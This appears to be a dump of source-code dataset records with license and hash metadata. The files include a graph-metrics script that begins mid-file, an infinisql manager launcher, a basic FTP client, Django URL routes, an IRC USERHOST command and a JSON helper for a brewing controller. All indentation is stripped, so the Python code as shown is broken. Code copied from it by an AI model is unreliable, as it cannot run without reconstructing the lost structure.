sa = int(math.ceil(zz/75))
for i in range(0, len(l), sa):
print "(" + str(i) + "," + str(l[i]) + ")"
def hop_plots(orig_g_M, otherModel_M, name):
m_hops_ar = []
for g in orig_g_M:
c = metrics.get_graph_hops(g, 20)
d = dict(c)
m_hops_ar.append(d.values())
df = pd.DataFrame(m_hops_ar)
print '-- orig graph --\n'
l = list(df.mean())
zz = float(len(l))
if not zz == 0:
sa = int(math.ceil(zz/float(75)))
for i in range(0, len(l), sa):
print "(" + str(i) + "," + str(l[i]) + ")"
print '-- the other model --\n'
m_hops_ar = []
for g in otherModel_M:
c = metrics.get_graph_hops(g, 20)
d = dict(c)
m_hops_ar.append(d.values())
break
df = pd.DataFrame(m_hops_ar)
l = list(df.mean())
zz = float(len(l))
if not zz == 0:
sa = int(math.ceil(zz/float(75)))
for i in range(0, len(l), sa):
print "(" + str(i) + "," + str(l[i]) + ")"
def clustering_coefficients(orig_g_M, otherModel_M, name):
if len(orig_g_M) is not 0:
dorig = pd.DataFrame()
for g in orig_g_M:
degdf = pd.DataFrame.from_dict(g.degree().items())
ccldf = pd.DataFrame.from_dict(nx.clustering(g).items())
dat = np.array([degdf[0], degdf[1], ccldf[1]])
df = pd.DataFrame(np.transpose(dat))
df = df.astype(float)
df.columns = ['v', 'k', 'cc']
dorig = pd.concat([dorig, df]) # Appends to bottom new DFs
print "orig"
gb = dorig.groupby(['k'])
zz = len(gb['cc'].mean().values)
sa = int(math.ceil(zz/75))
if sa == 0: sa=1
for x in range(0, len(gb['cc'].mean().values), sa):
print "(" + str(gb['cc'].mean().index[x]) + ", " + str(gb['cc'].mean().values[x]) + ")"
if len(otherModel_M) is not 0:
dorig = pd.DataFrame()
for g in otherModel_M:
degdf = pd.DataFrame.from_dict(g.degree().items())
ccldf = pd.DataFrame.from_dict(nx.clustering(g).items())
dat = np.array([degdf[0], degdf[1], ccldf[1]])
df = pd.DataFrame(np.transpose(dat))
df = df.astype(float)
df.columns = ['v', 'k', 'cc']
dorig = pd.concat([dorig, df]) # Appends to bottom new DFs
print "otherModel_M"
gb = dorig.groupby(['k'])
zz = len(gb['cc'].mean().values)
sa = int(math.ceil(zz/75))
if sa == 0: sa=1
for x in range(0, len(gb['cc'].mean().values), sa):
print "(" + str(gb['cc'].mean().index[x]) + ", " + str(gb['cc'].mean().values[x]) + ")"
return
def assortativity(orig_g_M, otherModel_M, name):
if len(orig_g_M) is not 0:
dorig = pd.DataFrame()
for g in orig_g_M:
kcdf = pd.DataFrame.from_dict(nx.average_neighbor_degree(g).items())
kcdf['k'] = g.degree().values()
dorig = pd.concat([dorig, kcdf])
print "orig"
gb = dorig.groupby(['k'])
zz = len(gb[1].mean().values)
sa = int(math.ceil(zz/75))
if sa == 0: sa=1
for x in range(0, len(gb[1].mean().values), sa):
print "(" + str(gb.mean().index[x]) + ", " + str(gb[1].mean().values[x]) + ")"
if len(otherModel_M) is not 0:
dorig = pd.DataFrame()
for g in otherModel_M:
kcdf = pd.DataFrame.from_dict(nx.average_neighbor_degree(g).items())
kcdf['k'] = g.degree().values()
dorig = pd.concat([dorig, kcdf])
print "the other model ", name
gb = dorig.groupby(['k'])
zz = len(gb[1].mean().values)
sa = int(math.ceil(zz/75))
if sa == 0: sa=1
for x in range(0, len(gb[1].mean().values), sa):
print "(" + str(gb.mean().index[x]) + ", " + str(gb[1].mean().values[x]) + ")"
return
def kcore_decomposition(orig_g_M, otherModel_M, name):
dorig = pd.DataFrame()
for g in orig_g_M:
g.remove_edges_from(g.selfloop_edges())
d = nx.core_number(g)
df = pd.DataFrame.from_dict(d.items())
df[[0]] = df[[0]].astype(int)
gb = df.groupby(by=[1])
dorig = pd.concat([dorig, gb.count()], axis=1) # Appends to bottom new DFs
print "orig"
if not dorig.empty :
zz = len(dorig.mean(axis=1).values)
sa = int(math.ceil(zz/75))
if sa == 0: sa=1
for x in range(0, len(dorig.mean(axis=1).values), sa):
print "(" + str(dorig.mean(axis=1).index[x]) + ", " + str(dorig.mean(axis=1).values[x]) + ")"
dorig = pd.DataFrame()
for g in otherModel_M:
d = nx.core_number(g)
df = pd.DataFrame.from_dict(d.items())
df[[0]] = df[[0]].astype(int)
gb = df.groupby(by=[1])
dorig = pd.concat([dorig, gb.count()], axis=1) # Appends to bottom new DFs
print "== the other model =="
if not dorig.empty :
zz = len(dorig.mean(axis=1).values)
sa = int(math.ceil(zz/75))
if sa == 0: sa=1
for x in range(0, len(dorig.mean(axis=1).values), sa):
print "(" + str(dorig.mean(axis=1).index[x]) + ", " + str(dorig.mean(axis=1).values[x]) + ")"
return
def alchemee(graph,graphName):
g = graph
gn = graphName
lst_files = glob("../BTERgraphs/*{}*th.tsv".format(gn))
for j,f in enumerate(lst_files):
print '--<{}>-- {} --'.format(j,f)
a = nx.read_edgelist(f)
# degree_prob_distributuion( [g], [a], gn)
# print '-- network value --'
# network_value_distribution([g], [a], gn)
# print '-- Hop Plot --'
# hop_plots([g], [a], gn)
# print '\tclustering coeffs -- \n'
# clustering_coefficients([g], [a], gn)
print '\tdraw_assortativity_coefficients -- \n'
assortativity([g], [a], gn)
# print '\tdraw_kcore_decomposition -- \n'
# kcore_decomposition([g], [a], gn)
return
def get_parser():
parser = argparse.ArgumentParser(description='shelves: Process Infinity Mirror Graphs')
parser.add_argument('--g', metavar='GRAPH', help='graph edge-list')
parser.add_argument('--version', action='version', version=__version__)
return parser
def main():
global name
parser = get_parser()
args = vars(parser.parse_args())
if not args['g']:
parser.print_help()
os._exit(1)
print args['g']
try:
cg = nx.read_edgelist(args['g'])
# shlv = shelve.open(args['shl'])
except Exception, e:
print str(e)
cg = nx.read_edgelist(args['g'], comments="%")
name = os.path.basename(args['g']).rstrip('.txt')
if 1:
alchemee(cg, name)
print 'alchemee: Done'
exit(0)
if 1:
lst_files = glob("../Results/synthg_*"+ str(name)+ "*.shl")
for j,shlf in enumerate(lst_files):
shlv = shelve.open(shlf)
print "====>", j, len(shlv['clgm'][0]), len(shlv['kpgm'][0]), len(shlv['kpgm'][0][0]), type(shlv['kpgm'][0][0])
# print '\tdraw_degree_probability_distribution', '-'*40
# metrics.draw_degree_probability_distribution(orig_g_M=[cg], HRG_M=[], pHRG_M=[], chunglu_M=shlv['clgm'][0], kron_M=shlv['kpgm'][0]) #( chunglu_M, HRG_M, pHRG_M, kron_M)
# print '\tdraw_network_value','-'*40
# metrics.draw_network_value([cg], shlv['clgm'][0], [], [], shlv['kpgm'][0])
# print '\tdraw_hop_plot','-'*40
# metrics.draw_hop_plot([cg], shlv['clgm'][0], [], [], shlv['kpgm'][0])
# print '\tdraw_kcore_decomposition','-'*40
# metrics.draw_kcore_decomposition([cg], shlv['clgm'][0], [], [], shlv['kpgm'][0])
# print '\tdraw_clustering_coefficients','-'*40
# metrics.draw_clustering_coefficients([cg], shlv['clgm'][0], [], [], shlv['kpgm'][0])
# print '\tdraw_assortativity_coefficients','-'*40
# metrics.draw_assortativity_coefficients([cg], shlv['clgm'][0], [], [], shlv['kpgm'][0])
# metrics.draw_diam_plot([], [chunglu_M, HRG_M, pHRG_M, kron_M] )
# metrics.draw_degree_rank_plot(G, chunglu_M)
# metrics.draw_network_value(G, chunglu_M)
# print '-- degree dist --'
# degree_prob_distributuion( [cg], shlv['kpgm'][0], name)
# print '-- network value --'
# network_value_distribution([cg], shlv['kpgm'][0], name)
# print '-- Hop Plot --'
# hop_plots([cg], [shlv['kpgm'][0][0]], name)
# print '-- clustering coeffs --'
# clustering_coefficients([cg], shlv['kpgm'][0], name)
# print '\tdraw_assortativity_coefficients','-'*40
# assortativity([cg], shlv['kpgm'][0], name)
print '\tdraw_kcore_decomposition','-'*40
kcore_decomposition([cg], shlv['kpgm'][0], name)
else:
lst_files = glob("../Results/*"+ str(name)+ "*.shl")
with open('../Results/{}_gcd_infinity.txt'.format(str(name)), 'w') as tmp:
tmp.write('-- {} ----\n'.format(name))
for j,shlf in enumerate(lst_files):
print "--"+ shlf + "-"*40
shlv = shelve.open(shlf)
df_g = metrics.external_rage(cg)
gcm_g = metrics.tijana_eval_compute_gcm(df_g)
clgm_gcd = []
kpgm_gcd = []
tmp.write('---- clgm ----\n')
for i,sg in enumerate(shlv['clgm'][0]):
df = metrics.external_rage(sg)
gcm_h = metrics.tijana_eval_compute_gcm(df)
s = metrics.tijana_eval_compute_gcd(gcm_g, gcm_h)
#
# tmp.write("(" + str(i) + "," + str(s) + ')\n')
clgm_gcd.append(s)
tmp.write("(" +str(j) +"," + str(np.mean(clgm_gcd)) + ')\n')
tmp.write('---- kpgm ----\n')
for i,sg in enumerate(shlv['kpgm'][0]):
df = metrics.external_rage(sg)
gcm_h = metrics.tijana_eval_compute_gcm(df)
s = metrics.tijana_eval_compute_gcd(gcm_g, gcm_h)
#
# tmp.write("(" + str(i) + "," + str(s) + ')\n')
kpgm_gcd.append(s)
tmp.write("(" +str(j) +"," + str(np.mean(kpgm_gcd)) + ')\n')
if __name__ == "__main__":
try:
main()
except Exception, e:
print str(e)
traceback.print_exc()
os._exit(1)
sys.exit(0)
|
gpl-3.0
| -7,554,848,798,561,009,000
| 32.330827
| 176
| 0.558764
| false
| 2.811034
| false
| false
| false
|
infinisql/infinisql
|
manager/infinisqlmgr/management_server.py
|
1
|
4169
|
__author__ = 'Christopher Nelson'
import logging
import os
import signal
import time
from infinisqlmgr import common, management
def start_management_server(config):
from infinisqlmgr.management import util
common.configure_logging(config)
cluster_name = config.get("management", "cluster_name")
existing_pid = util.get_pid(config.dist_dir, cluster_name)
if existing_pid is not None:
logging.error("A management process appears to exist already. You should run the 'manager stop' command first "
"to make sure the existing process has stopped.")
return 1
logging.debug("forking management server")
pid = os.fork()
if pid!=0:
util.write_pid(config.dist_dir, cluster_name, pid)
logging.info("Parent start_management_server() finished")
return 0
logging.debug("creating management process")
management_server = management.Controller(config)
logging.debug("starting management process")
return management_server.run()
def stop_management_server(config):
from infinisqlmgr.management import util
common.configure_logging(config)
cluster_name = config.get("management", "cluster_name")
existing_pid = util.get_pid(config.dist_dir, cluster_name)
if existing_pid is not None:
logging.info("Trying to stop the existing process at pid %d", existing_pid)
try:
os.kill(existing_pid, signal.SIGTERM)
except ProcessLookupError:
logging.debug("the management process is not running")
else:
logging.info("Waiting for process %d exit", existing_pid)
try:
pid, exit_status = os.waitpid(existing_pid, 0)
except ChildProcessError:
# We ignore this because the child process might have already gone away, and we
# won't be able to get status information about it.
pass
else:
return_code = exit_status >> 8
logging.debug("management process exited with code %d", return_code)
if return_code!=0:
logging.warning("There was an error while stopping the management process, check the logs for more detail.")
# Make sure that the pid file is gone, even if it's empty.
if util.exists(config.dist_dir, cluster_name):
run_path = util.get_run_path(config.dist_dir, cluster_name)
logging.debug("deleting run file at: %s", run_path)
os.unlink(run_path)
logging.info("Stopped management process for cluster: %s" % cluster_name)
def restart_management_server(config):
stop_management_server(config)
time.sleep(1)
start_management_server(config)
def add_args(sub_parsers):
mgr_parser = sub_parsers.add_parser('manager', help='Options for controlling a management process')
mgr_parser.add_argument('--no-background', dest='daemonize', action='store_false',
default=True,
help='Do not run the manager in the background. Useful for debugging. (default is off)')
mgr_parser.add_argument('--cluster-name', dest='cluster_name',
default="default_cluster",
help='Set the cluster name to join. If the cluster does not exist it will be created. '
'(default is %(default)s)')
ss_parsers = mgr_parser.add_subparsers()
start_parser = ss_parsers.add_parser('start', help='Start a management process')
mgr_parser.add_argument('--listen-interface', dest='management_interface',
default="*",
help='Set the interface to listen on.'
'(default is %(default)s)')
start_parser.set_defaults(func=start_management_server)
stop_parser = ss_parsers.add_parser('stop', help='Stop a management process')
stop_parser.set_defaults(func=stop_management_server)
restart_parser = ss_parsers.add_parser('restart', help='Restart a management process')
restart_parser.set_defaults(func=restart_management_server)
|
gpl-3.0
| -880,550,437,333,261,600
| 41.111111
| 128
| 0.638283
| false
| 4.297938
| true
| false
| false
|
ndparker/tdi3
|
tdi/_abstract.py
|
1
|
1329
|
# -*- coding: ascii -*-
u"""
:Copyright:
Copyright 2017
Andr\xe9 Malo or his licensors, as applicable
:License:
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
================
ABC base setup
================
ABCs base setup
"""
__author__ = u"Andr\xe9 Malo"
__docformat__ = "restructuredtext en"
import abc as _abc
# pylint: disable = invalid-name
base = type.__new__(_abc.ABCMeta, 'base', (), {})
method = _abc.abstractmethod
def make_impl(space):
""" Make impl function """
def impl(*which):
""" Register implementation for abstract ... """
def inner(cls):
""" Decorator """
for target in which:
if isinstance(target, str):
target = space[target]
target.register(cls)
return cls
return inner
return impl
|
apache-2.0
| -4,359,358,447,965,685,000
| 25.058824
| 73
| 0.638074
| false
| 4.287097
| false
| false
| false
|
NileshPS/OS-and-Networking-programs
|
5_ftp/client.py
|
1
|
5165
|
#!/usr/bin/python3
import socket
import os
import sys
import logging as log
import getpass
from helper import *
log.basicConfig(format="[%(levelname)s] %(message)s", level=log.DEBUG)
class FTPError(Exception):
pass
class FTPClient:
def __init__(self):
self.sock = None
self.is_connected = False
self.is_authenticated = False
self.server_name = ''
# Establish a connection with remote FTP host
def open(self, hostname='', port=3302):
if self.is_connected:
raise FTPError(
'Already connected to %s, use close first.' % self.server_name)
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(5)
try:
port = int(port)
except ValueError:
raise FTPError("Bad port address.")
self.sock.connect((hostname, port))
# Ping the server
sock_send(self.sock, FTPRequest('ping'))
# Print response
print(sock_recv(self.sock))
self.server_name = hostname # Save hostname for later
self.is_connected = True
# Initialise authentication procedure
self.init_auth()
def is_open(self):
return self.is_connected
def init_auth(self):
username = input("Name (%s) : " % self.server_name).strip()
passwd = getpass.getpass("Password : ")
# Authenticate with server
sock_send(self.sock, FTPRequest('auth', [username, passwd]))
response = sock_recv(self.sock)
if response.code // 100 != 2:
raise FTPError('%d %s' % (response.code, 'Login Incorect.'))
print(response.message)
self.is_authenticated = True
def send(self, query):
if not self.is_connected:
raise FTPError('Not Connected.')
if not self.is_authenticated:
raise FTPError('530 Please login with USER and PASS.')
if len(query) == 0:
return None # Silently ignore
elif query[0] == 'get' or query[0] == 'put':
if len(query) != 2:
raise FTPError('Please provide a filename.')
if query[0] == 'put':
try:
pack = FTPRequest('put', [
FileWrapper(query[1],
open(query[1], 'rb').read())])
sock_send(self.sock, pack)
return sock_recv(self.sock)
except OSError as oe:
raise FTPError(str(oe))
# else
pack = FTPRequest(query[0], query[1:])
sock_send(self.sock, pack)
return sock_recv(self.sock)
def close(self):
if (self.sock is not None):
sock_send(self.sock, FTPRequest('close'))
self.sock.close()
self.is_connected = False
self.is_authenticated = False
self.server_name = ''
self.sock = None
client = FTPClient()
def main():
global client
while True:
try:
query = input("ftp> ").strip().split(" ")
if len(query) == 0:
continue
if query[0] == '?':
# Show a list of available features
print(' '.join(COMMANDS))
elif query[0] == 'open':
# Establish a remote connection
if len(query) == 1:
query.append(input("(to) "))
client.open(query[1], query[2] if len(query) > 2 else 3302)
elif query[0] == 'close':
client.close()
log.info("Disconnected.")
elif query[0] == 'exit':
client.close()
break
elif query[0] == 'lcd':
try:
if len(query) == 2:
os.chdir(query[1])
except Exception as e:
raise FTPError(str(e))
elif query[0] not in COMMANDS:
log.error("Invalid command. Type ? for help")
else:
response = client.send(query)
if response.action == FTPResponse.ACTION_DISPLAY:
log.info(response)
log.info(response.data.decode('utf8'))
elif response.action == FTPResponse.ACTION_SAVE:
if type(response.data) != FileWrapper:
raise TypeError(
"Expected type of FileWrapper in Response.data." +
" Got %s." % str(type(response.data)))
try:
response.data.write(os.getcwd())
log.info(str(response))
except OSError as e:
log.error(str(e))
elif response.action == FTPResponse.ACTION_IGNORE:
log.info(response)
except FTPError as fe:
log.error(str(fe))
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt as e:
if client is not None:
client.close()
client = None
sys.exit(0)
|
gpl-3.0
| 5,413,776,981,236,701,000
| 32.322581
| 79
| 0.501839
| false
| 4.347643
| false
| false
| false
|
juanc27/myfavteam
|
mysite/urls.py
|
1
|
1833
|
from django.conf.urls import patterns, include, url
from django.contrib import admin
from django.conf import settings
from django.conf.urls.static import static
admin.autodiscover()
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'mysite.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^admin/', include(admin.site.urls)),
url(
regex=r'^team/(?P<team_id>\d+)/$',
view='myfavteam.views.index'),
url(
regex=r"^$",
view='myfavteam.views.index'),
url(
regex=r'^news/team/(?P<team_id>\d+)/$',
view='myfavteam.views.news'),
url(
regex=r"^news/",
view='myfavteam.views.news'),
url(
regex=r'^social/team/(?P<team_id>\d+)/$',
view='myfavteam.views.social'),
url(
regex=r"^social/",
view='myfavteam.views.social'),
url(
regex=r'^schedule/team/(?P<team_id>\d+)/$',
view='myfavteam.views.schedule'),
url(
regex=r"^schedule/",
view='myfavteam.views.schedule'),
url(
regex=r'^standings/team/(?P<team_id>\d+)/$',
view='myfavteam.views.standings'),
url(
regex=r"^standings/",
view='myfavteam.views.standings'),
url(
regex=r'^stats/team/(?P<team_id>\d+)/$',
view='myfavteam.views.stats'),
url(
regex=r"^stats/",
view='myfavteam.views.stats'),
url(
regex=r'^roster/team/(?P<team_id>\d+)/$',
view='myfavteam.views.roster'),
url(
regex=r"^roster/",
view='myfavteam.views.roster'),
url(
regex=r'^player/(?P<player_id>\d+)/$',
view='myfavteam.views.player'),
url(
regex=r"^player/",
view='myfavteam.views.player'),
) + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
mit
| -4,842,875,258,234,641,000
| 28.095238
| 65
| 0.556465
| false
| 3.320652
| false
| true
| false
|
ElementalAlchemist/txircd
|
txircd/modules/rfc/cmd_userhost.py
|
1
|
1249
|
from twisted.plugin import IPlugin
from twisted.words.protocols import irc
from txircd.module_interface import Command, ICommand, IModuleData, ModuleData
from zope.interface import implements
class UserhostCommand(ModuleData, Command):
implements(IPlugin, IModuleData, ICommand)
name = "UserhostCommand"
core = True
def userCommands(self):
return [ ("USERHOST", 1, self) ]
def parseParams(self, user, params, prefix, tags):
if not params:
user.sendSingleError("UserhostParams", irc.ERR_NEEDMOREPARAMS, "USERHOST", "Not enough parameters")
return None
return {
"nicks": params[:5]
}
def execute(self, user, data):
userHosts = []
for nick in data["nicks"]:
if nick not in self.ircd.userNicks:
continue
targetUser = self.ircd.users[self.ircd.userNicks[nick]]
output = targetUser.nick
if self.ircd.runActionUntilValue("userhasoperpermission", targetUser, "", users=[targetUser]):
output += "*"
output += "="
if targetUser.metadataKeyExists("away"):
output += "-"
else:
output += "+"
output += "{}@{}".format(targetUser.ident, targetUser.host())
userHosts.append(output)
user.sendMessage(irc.RPL_USERHOST, " ".join(userHosts))
return True
userhostCmd = UserhostCommand()
|
bsd-3-clause
| -2,786,711,777,351,139,300
| 28.761905
| 102
| 0.707766
| false
| 3.252604
| false
| false
| false
|
Theoklitos/chestfreezer
|
chestfreezer-backend/util/json_parser.py
|
1
|
6422
|
'''
Created on Apr 4, 2014
Simple json marshalling utils for the classes in this project
#TODO Note: This whole module is pointless! Bottle.py can easily marshal dictionaries into/from json!
@author: theoklitos
'''
from control import brew_logic
from util import misc_utils, configuration
from database import db_adapter
def _pretty_state_identifier(state):
""" returns 'off' for False and 'on' for True """
if state:
return 'on'
else:
return 'off'
def get_temperature_reading_array_as_json(temperature_reading_list):
""" returns a list of temp readings as a json array """
result = '['
for temperature_reading in temperature_reading_list:
result += '\n' + get_temperature_reading_as_json(temperature_reading) + ','
if len(temperature_reading_list) != 0:
result = result[:-1]
return result + '\n]'
def get_temperature_reading_as_json(temperature_reading):
""" returns a single temp reading as a json object """
result = '{\n "probe_id" : "' + temperature_reading.probe_id + '",\n "temperature_C" : "' + str(temperature_reading.temperature_C) + '",\n "temperature_F" : "' + str(temperature_reading.temperature_F) + '",\n "timestamp" : "' + str(temperature_reading.timestamp) + '"\n}'
return result
def get_heater_device_json():
""" returns information about the heater in json """
return '{\n "state" : "' + _pretty_state_identifier(brew_logic.heater_state) + '",\n "overridden" : "' + str(brew_logic.heater_override).lower() + '"\n }'
def get_freezer_device_json():
""" returns information about the freezer in json """
return '{\n "state" : "' + _pretty_state_identifier(brew_logic.freezer_state) + '",\n "overridden" : "' + str(brew_logic.freezer_override).lower() + '"\n }'
def get_both_devices_json():
""" returns information about both the freezer and the heater as a json object """
return '{\n "heater" : ' + get_heater_device_json() + ',\n "freezer" : ' + get_freezer_device_json() + '\n}'
def get_probe_array_as_json(probe_list):
""" returns a list of temp probes as a json array """
result = '['
for probe in probe_list:
result += '\n' + get_probe_as_json(probe) + ','
return result[:-1] + '\n]'
def get_probe_as_json(probe):
""" returns a single temp probe as a json object """
master_value = 'False'
if probe.master == 1:
master_value = 'True'
result = '{\n "probe_id" : "' + str(probe.probe_id) + '",\n "name" : "' + str(probe.name) + '",\n "master" : "' + master_value + '"\n}'
return result
def get_instruction_as_json(instruction):
""" returns a single instruction as a json object """
result = '{\n "instruction_id" : "' + instruction.instruction_id + '",\n "target_temperature_C" : "' + str(instruction.target_temperature_C) + '",\n "from_timestamp" : "' + str(instruction.from_timestamp) + '",\n "to_timestamp" : "' + str(instruction.to_timestamp) + '",\n "description" : "' + instruction.description + '"\n}'
return result
def get_instruction_array_as_json(instruction_list):
""" returns the given instruction array as a json list """
result = '['
for instruction in instruction_list:
result += '\n' + get_instruction_as_json(instruction) + ','
if len(instruction_list) != 0:
result = result[:-1]
return result + '\n]'
def get_target_temperature_json():
""" returns information about the current "target" temperature """
is_overriden = False
if brew_logic.temperature_override_C is not None:
actual_target_C = brew_logic.temperature_override_C
is_overriden = True
elif brew_logic.instruction_target_temperature_C is not None: actual_target_C = brew_logic.instruction_target_temperature_C
elif (brew_logic.instruction_target_temperature_C is None) & (not is_overriden): return
if actual_target_C is None: return
current_instruction_json = ""
actual_target_F = misc_utils.celsius_to_fahrenheit(actual_target_C)
if brew_logic.current_instruction_id is not None: current_instruction_json = ',\n"current_instruction_id" : "' + brew_logic.current_instruction_id + '" '
return '{\n "target_temperature_C" : ' + str(actual_target_C) + ',\n "target_temperature_F" : ' + str(actual_target_F) + ',\n "overridden" : "' + str(is_overriden).lower() + '"' + current_instruction_json + '\n}'
def get_settings_as_json():
""" returns the application options as a json object """
store_temperature_interval_seconds = configuration.store_temperature_interval_seconds()
l1 = ' "store_temperature_interval_seconds" : ' + str(int(store_temperature_interval_seconds)) + ',';
instruction_interval_seconds = configuration.instruction_interval_seconds()
l2 = ' "instruction_interval_seconds" : ' + str(int(instruction_interval_seconds)) + ',';
control_temperature_interval_seconds = configuration.control_temperature_interval_seconds()
l3 = ' "monitor_temperature_interval_seconds" : ' + str(int(control_temperature_interval_seconds)) + ',';
temperature_tolerance = configuration.temperature_tolerance()
l4 = ' "temperature_tolerance_C" : ' + str(temperature_tolerance) + ',';
database_size = db_adapter.get_database_size()
l5 = ' "database_size_MB" : ' + str(round(database_size,1)) + ',';
database_free_size = db_adapter.get_database_free_size()
l6 = ' "database_free_size_MB" : ' + str(round(database_free_size,1)) + '';
return '{\n ' + l1 + '\n ' + l2 + '\n ' + l3 + '\n ' + l4 + '\n ' + l5 + '\n ' + l6 + '\n}'
def get_beer_as_json(beer):
""" returns the given beer as a json object """
return {'beer_id' : beer.beer_id, 'name' : beer.name, 'style' : beer.style, 'fermenting_from' : beer.fermenting_from_timestamp, 'fermenting_to' : beer.fermenting_to_timestamp, 'dryhopping_from' : beer.dryhopping_from_timestamp, 'dryhopping_to' : beer.dryhopping_to_timestamp, 'conditioning_from' : beer.conditioning_from_timestamp, 'conditioning_to' : beer.conditioning_to_timestamp, 'rating' : beer.rating, 'comments' : beer.comments}
def get_all_beers_as_json():
""" returns all the beers in the database as a json array """
from json import dumps
result = []
for beer in db_adapter.get_all_beers():
result.append(get_beer_as_json(beer))
return dumps(result)
|
mit
| 5,555,243,227,549,169,000
| 53.888889
| 439
| 0.646372
| false
| 3.325738
| false
| false
| false
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.